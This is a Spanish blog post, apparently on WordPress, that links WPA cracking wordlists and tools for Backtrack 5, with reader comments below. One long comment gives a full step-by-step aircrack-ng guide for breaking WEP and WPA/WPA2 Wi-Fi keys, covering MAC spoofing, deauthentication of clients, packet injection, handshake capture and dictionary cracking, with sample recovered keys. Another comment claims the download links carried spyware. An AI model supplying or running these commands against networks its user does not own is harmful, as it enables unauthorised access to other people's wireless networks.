Diccionario para Redes WPA. backtrack 5 revolution dictionary


Dos diccionarios para usar con Backtrack 5 y anteriores

Slds:

En función del idioma.

http://www.insidepro.com/eng/download.shtml

quizás pueda interesarte http://www.insidepro.com/

Un ripeador de claves :

http://www.openwall.com/john/

Diccionarios en torrent (utorrent recomendado)

http://torrents.thepiratebay.se/5977355/WPA_word_list.5977355.TPB.torrent  1.36 GiB (1456289622 Bytes)

http://torrents.thepiratebay.se/5979896/WPA_Dictionary.5979896.TPB.torrent 71.61 MiB (75093626 Bytes)

http://torrents.thepiratebay.se/5945498/WPA-PSK_WORDLIST_3_Final_(13_GB).rar.5945498.TPB.torrent

Acerca de Rafael Quintana

Con ganas de compartir y de aprender
Esta entrada fue publicada en Informática e Internet, Linux, Seguridad y etiquetada , , , , . Guarda el enlace permanente.

17 respuestas a Diccionario para Redes WPA. backtrack 5 revolution dictionary

  1. Anónimo dijo:

    Gracias lo probare

  2. Anónimo dijo:

    🙂

  3. Anónimo dijo:

    no mamn ya resuban los malditos links en otro perro server porke ya tiene komo un puto milenio cerrado el megaouplad porfavorr sompas no marchenn hay porfaaa

  4. Anónimo dijo:

    desgraciado, deja de jugar con la gente, me metiste un spyware, tu p. m

    • rqvalencia dijo:

      Desgraciadamente te equivocas. Los enlaces son limpios y como puedes comprender no puedo controlar la red y lo que otros hagan. Aparte un buen antivirus y linux.;-)

  5. Anónimo dijo:

    muchas gracias, desde lo de megauload cuesta mucho encontrar ciertas cosas

  6. Anónimo dijo:

    Gracias! veremos si me funciona.

  7. anon dijo:

    como meto los diccionarios a backtrack 5

    • rqvalencia dijo:

      Los diccionarios los guardas en el escritorio. Caso de estasr comprimidos los descomprimes. Según la apliación que utilices, le tendrás que indicar la direccion de la carpeta

  8. jossete dijo:

    me sirven estos diccionarios para wifislax tambien?

  9. pEdRiHñO dijo:

    cual d todos los diccionarios me recomienda para backtrack5

  10. Anónimo dijo:

    como los coloco

    • ejecuta la ayuda del aircrak
      aircrack-ng -w /root/swireless/wordlist/diccionario /root/swireless/capturas/captura.cap

      PARA AUDITORIAS WPA-WPA2 SÓLO NECESITAS UN PAQUETE LLAMADO HANDSHAKE Y NO 120.000 COMO PARA WEP

      HANDSHAKE:

      Traducido es “apreton de manos”, o sea el momento en que ordenata y punto de acceso se “vuelven a saludar” y se mandan la clave, al reconocerse como “colegas”, ese es el momento en que el airodump captura ese preciado handshake que contiene laclave, buff mi espalda, me duele de tanto escribir xd, este preciado handshake es fundamental para el ataque wpa-wpa2, porque es el que guarda la clave wpa-wpa2, despues, simplemente hay que compararlo con el diccionario y voilà.

      DICCIONARIO(WORDLIST) :

      La pena de todo esto, infelices que habeis leído hasta aquí, es que una clave wpa-wpa2 no se puede capturar a no ser que sea del tipo manolin233 o tobi8876, o que tengas un diccionario acojonante, y de esos, desafortunadamente todavía no existen, si sabeis de alguno me lo mandais a rbauluz@telecable.es

      Ahora en serio, y último consejo:

      El diccionario deberá estar guardado en la carpeta donde estas haciendo todo: En Wifislax es: / root
      En Ubuntu la del usuario, pero vale cualquiera mientras sepas donde tienes el diccionario, lo mejor para los novatos es tener el diccionario en la misma carpeta dónde haces todo).

      LO DEL ATAQUE WPA-WPA2 CON CLIENTE :

      Vamos a ver, que como intentes atacar el router de un “amigo”, que en ese momento no tenga conectado un pc a su router y con la mula puesta, pues eso, que lo llevas claro, te llevaría siglos, o toda tu paciencia, la cual es mejor dedicar a tratar mejor a tu vecino y pedirle la clave, para que amablemente la comparta contigo y llegar juntos a pagar menos a TIMOFONICA xd.

      INDICE DE COMANDOS USADOS(por orden de aparición y uso):

      Comandos para WEP:

      ifconfig
      iwconfig
      ifconfig wlan0 up
      airmon-ng start wlan0
      iwconfig
      ifconfig mon0 down
      macchanger -m 00:11:22:33:44:55 mon0
      ifconfig mon0 up
      airodump-ng mon0

      pulsar control-c para parar airodump

      airodump-ng mon0 -w jander -c 6
      aireplay-ng -1 0 -e jander -a 00:13:F7:1D:B6:CF -h 00:11:22:33:44:55 mon0
      aireplay-ng -3 -b 00:13:F7:1D:B6:CF -h 00:11:22:33:44:55 mon0
      aircrack-ng jander*.cap

      Comandos para WPA :

      ifconfig
      iwconfig
      ifconfig wlan0 up
      airmon-ng start wlan0
      iwconfig
      airodump-ng -c 6 –bssid 00:13:f7:1d:b6:cf -w jander mon0
      aireplay-ng -0 30 -a 00:13:F7:1D:B6:CF -c 00:21:5d:35:02:50 mon0
      aircrack-ng -w dictionary_spanish.dic -0 jander*.cap

      Nota : el ataque se realizó sobre mi router Smcwbr-14-g, con la mula conectada desde el cliente en el caso Wpa, con un diccionario, capturando el handshake en 5 minutos.
      En el caso de la clave WEP, se hizo falseando la MAC con macchanger, tambien con tráfico, y en unos dos minutos empezó a inyectar como loco, en 10 minutos tenía 200000 arps xd.

      SACANDO CLAVE WEP

      1er PASO : Configurar la tarjeta en modo monitor: AIRMON

      ifconfig
      iwconfig
      ifconfig wlan0 up
      airmon-ng start wlan0
      airmon-ng start mon0
      ifconfig mon0 down
      macchanger -m 00:11:22:33:44:55 mon0 (como explica Alfonso Cruz en sus tres magistrales videos que recomiendo ver antes de empezar a meter comandos en la consola http://www.youtube.com/watch?v=whYDVSzvJQ8 ).

      ifconfig mon0 up

      2º PASO: Capturar paquetes: AIRODUMP

      airodump-ng mon0 (localizas la red y apunta su mac y su canal)
      control-c(Para parar el airodump)
      airodump-ng mon0 -w jander -c 6 (lo dejas capturando)

      3er PASO: Autentificarse : AIREPLAY, en otra consola

      aireplay-ng -1 0 -e jander -a 00:13:F7:1D:B6:CF -h 00:11:22:33:44:55 mon0
      si la autentificacion es correcta, debe decir sucessful🙂 pasas al siguiente paso.

      4º PASO : Inyectar paquetes: AIREPLAY

      aireplay-ng -3 -b 00:13:f7:1D:B6:CF -h 00:11:22:33:44:55 mon0 y cuando llegues a 120000 arps:

      5º PASO: Buscar clave en el archivo de captura jander.cap : AIRCRACK

      aircrack-ng jander*.cap

      KEY FOUND! [ 5A:30:30:30:32:43:46:42:37:35:41:38:32 ] (ASCII: Z0002CFB75A82 )

      FIN

      SACANDO CLAVE WAP-WAP2

      1er Paso : Configurar la tarjeta :AIRMON

      ifconfig
      iwconfig
      ifconfig wlan0 up
      airmon-ng start wlan0
      airmon-ng start mon0

      2º Paso : Capturar paquetes: AIRODUMP

      airodump-ng mon0
      cuando veas tu punto de acceso a atacar, control-c y en otra consola :
      airodump-ng -c 6 –bssid 00:13:F7:1D:B6:CF -w jander mon0

      3er Paso: Deautentificar : AIREPLAY en otra consola

      aireplay-ng -0 30 -a 00:13:F7:1D:B6:CF -c 00:21:5d:35:02:50 mon0

      Después de usar este comando, fijaros de vez en cuando en la pantalla del airodump, ARRIBA A LA DERECHA, y ahí debe aparecer el preciado handshake y a continuación, el 4º paso.

      4º Paso : Buscar la clave en el Dicionario :AIRCRACK,en otra consola

      aircrack-ng -w dictionary_spanish.dic -o jander*.cap

      KEY FOUND! [ CF:CF:CF:CF:CF ]

      FIN

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s